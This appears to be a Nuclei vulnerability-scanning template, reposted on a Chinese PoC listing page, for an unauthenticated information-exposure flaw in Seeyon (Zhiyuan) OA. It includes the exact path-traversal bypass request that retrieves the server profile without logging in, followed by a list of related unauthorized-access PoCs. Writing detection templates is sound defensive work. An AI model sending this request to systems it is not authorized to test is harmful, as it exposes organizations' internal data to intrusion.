zhiyuan-oa-unauthorized: Zhiyuan Oa Unauthorized

漏洞描述

PoC代码[已公开]

id: zhiyuan-oa-unauthorized

info:
  name: Zhiyuan Oa Unauthorized
  author: pikpikcu
  severity: low
  description: Zhiyuan Oa is exposed.
  reference:
    - https://buaq.net/go-53721.html
  metadata:
    max-request: 1
  tags: seeyon,unauth,zhiyuan,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "serverIdentifier"
          - "companyName"
        condition: and

      - type: word
        words:
          - "application/json"
        part: header

      - type: status
        status:
          - 200
# digest: 490a00463044022036a6a28921ec8a8ca6c57bad2948febb6d8a2ebc26bd8171e61412109806b6c5022040762dc05dae9a4e59a5638b1260e2e95ce92a5306993fc7393926cb61e71529:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• bt742-pma-unauthorized-access: BT742 PMA Unauthorized Access
• couchdb-unauthorized: CouchDB Unauthorized
• qizhi-fortressaircraft-unauthorized: qizhi fortressaircraft unauthorized
• POC CVE-2020-7136: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
• POC CVE-2021-35336: Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access
• POC CVE-2021-42627: D-Link DIR-615 - Unauthorized Access
• POC CVE-2021-45232: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
• POC CVE-2023-22478: KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access
• POC CVE-2023-28121: WooCommerce Payments - Unauthorized Admin Access
• POC CVE-2024-45591: XWiki Platform - Unauthorized Document History Access
• POC CVE-2024-54763: ipTIME A2004 - Unauthorized Access
• POC CVE-2024-54764: ipTIME A2004 - Unauthorized Access
• POC CVE-2024-54767: AVM FRITZ!Box 7530 AX - Unauthorized Access